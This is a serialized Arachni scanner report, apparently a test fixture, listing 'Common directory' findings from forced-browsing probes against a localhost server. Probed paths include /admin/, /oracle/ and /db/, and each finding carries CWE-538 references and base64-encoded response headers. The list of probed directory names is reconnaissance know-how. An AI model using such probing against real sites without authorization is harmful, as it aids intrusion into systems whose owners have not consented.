mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/java/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/java/ injected: java id: java elem: path remarks: {} method: '' response: java headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/zipfiles/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/zipfiles/ injected: zipfiles id: zipfiles elem: path remarks: {} method: '' response: zipfiles headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/job/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/job/ injected: job id: job elem: path remarks: {} method: '' response: job headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/jrun/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/jrun/ injected: jrun id: jrun elem: path remarks: {} method: '' response: jrun headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/admin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/admin/ injected: admin id: admin elem: path remarks: {} method: '' response: admin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/new/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/new/ injected: new id: new elem: path remarks: {} method: '' response: new headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/adm/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/adm/ injected: adm id: adm elem: path remarks: {} method: '' response: adm headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/oracle/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/oracle/ injected: oracle id: oracle elem: path remarks: {} method: '' response: oracle headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/odbc/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/odbc/ injected: odbc id: odbc elem: path remarks: {} method: '' response: odbc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/mall_log_files/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/mall_log_files/ injected: mall_log_files id: mall_log_files elem: path remarks: {} method: '' response: mall_log_files headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/WebTrend/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/WebTrend/ injected: WebTrend id: WebTrend elem: path remarks: {} method: '' response: WebTrend headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/order/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/order/ injected: order id: order elem: path remarks: {} method: '' response: order headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/support/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/support/ injected: support id: support elem: path remarks: {} method: '' response: support headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/mp3/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/mp3/ injected: mp3 id: mp3 elem: path remarks: {} method: '' response: mp3 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/db/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/db/ injected: db id: db elem: path remarks: {} method: '' response: db headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mg== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/msql/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/msql/ injected: msql id: msql elem: path remarks: {} method: '' response: msql headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
